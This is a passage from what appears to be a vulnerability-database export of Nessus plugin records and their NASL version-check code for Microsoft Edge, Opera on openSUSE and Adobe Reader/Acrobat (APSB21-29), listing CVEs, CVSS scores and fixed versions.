90.0.818.46 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 90.0.818.46. It is, therefore, affected\nby multiple vulnerabilities as referenced in the April 22, 2021 advisory. Note that Nessus has not tested for this issue\nbut has instead relied only on the application's self-reported version number.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#april-22-2021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0027f192\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21224\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21225\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21226\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 90.0.818.46 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '90.0.818.46' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:35", "description": "The version of Google Chrome installed on the remote Windows host is prior to 90.0.4430.85. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. 
behind detached window\n\n - DNA-92615 Capture tab from the tab context menu\n\n - DNA-92616 Capture tab from Snapshot\n\n - DNA-92617 Capture tab from image context menu\n\n - DNA-92652 Opera 76 translations\n\n - DNA-92680 Make image selector on any page work like\n bookmarks popup WP2\n\n - DNA-92707 Crash at void\n base::ObserverList::AddObserver(class\n content::PrerenderHost::Observer*)\n\n - DNA-92710 Autoupdate on macOS 11.3 not working\n\n - DNA-92711 Make image selector on any page work like\n bookmarks popup WP3\n\n - DNA-92730 Make image selector on any page work like\n bookmarks popup WP4\n\n - DNA-92761 Make image selector on any page work like\n bookmarks popup WP5\n\n - DNA-92776 Make image selector on any page work like\n bookmarks popup WP6\n\n - DNA-92862 Make “View pinboards” button work\n\n - DNA-92906 Provide in-house translations for Cashback\n strings to Spanish\n\n - DNA-92908 API collides with oneclick installer\n\n - The update to chromium 90.0.4430.85 fixes following\n issues :\n\n - CVE-2021-21222, CVE-2021-21223, CVE-2021-21224,\n CVE-2021-21225, CVE-2021-21226\n\n - Complete Opera 76.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-76/\n\nUpdate to version 75.0.3969.218\n\n - CHR-8393 Update chromium on desktop-stable-89-3969 to\n 89.0.4389.128\n\n - DNA-92113 Windows debug fails to compile\n opera_components/ipfs/ipfs/ipfs_url_loader_throttle.obj\n\n - DNA-92198 [Arm] Update signing scripts\n\n - DNA-92200 [Arm] Create universal packages from two\n buildsets\n\n - DNA-92338 [Search tabs] The preview isn’t updated\n when the tab from another window is closed\n\n - DNA-92410 [Download popup] Selected item still looks bad\n in dark mode\n\n - DNA-92441 Compilation error\n\n - DNA-92514 Allow to generate universal DMG package from\n existing universal .tar.xz\n\n - DNA-92608 Opera 75 crash during rapid workspace\n switching\n\n - DNA-92627 Crash at automation::Error::code()\n\n - DNA-92630 Crash at\n 
opera::PremiumExtensionPersistentPrefStorageImpl::IsPrem\n iumExtensionFeatureEnabled()\n\n - DNA-92648 Amazon icon disappears from Sidebar Extensions\n section after pressing Hide Amazon button\n\n - DNA-92681 Add missing string in Japanese\n\n - DNA-92684 Fix issues with signing multiple bsids\n\n - DNA-92706 Update repack generation from universal\n packages\n\n - DNA-92725 Enable IPFS for all channels\n\n - The update to chromium 89.0.4389.128 fixes following\n issues: CVE-2021-21206, CVE-2021-21220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.opera.com/desktop/changelog-for-76/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/01\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"opera-76.0.4017.94-lp152.2.43.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:56", "description": "The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20149. 
It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20149 Multiple Vulnerabilities (APSB21-29) (macOS)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", 
"CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOS_ADOBE_READER_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149378", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149378);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20149 Multiple Vulnerabilities (APSB21-29) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20149. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and\n 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted\n jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code\n execution in the context of the current user. 
Exploitation of this issue requires user interaction in that\n a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30194 / 2020.001.30020 / 2021.001.20149 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Reader');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20149', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:18", "description": "The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562, CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. 
(CVE-2021-28557)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2022-06-09T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149379", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149379);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2022/06/09\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Out-of-bounds write vulnerabilities that can result in arbitrary code execution. (CVE-2021-21044,\n CVE-2021-21038, CVE-2021-21086)\n\n - Use after free vulnerabilities that can result in arbitrary code execution. (CVE-2021-28562,\n CVE-2021-28550, CVE-2021-28553)\n\n - An out-of-bounds read vulnerability that can result in a memory leak. 
(CVE-2021-28557)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30196 / 2020.001.30025 / 2021.001.20155 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Adobe Reader', win_local:TRUE);\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:00", "description": "The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 
(CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29) (macOS)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOS_ADOBE_ACROBAT_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149381", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149381);\n script_version(\"1.9\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Acrobat <= 2017.011.30194 / 2020.001.30020 / 2021.001.20150 Multiple Vulnerabilities (APSB21-29) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20150. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and\n 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted\n jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code\n execution in the context of the current user. Exploitation of this issue requires user interaction in that\n a victim must open a malicious file. 
(CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb21-29.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30194 / 2020.001.30020 / 2021.001.20150 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Acrobat');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '21.001.20150', 'fixed_version' : '21.001.20155' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30020', 'fixed_version' : '20.001.30025' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30194', 'fixed_version' : '17.011.30196' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": 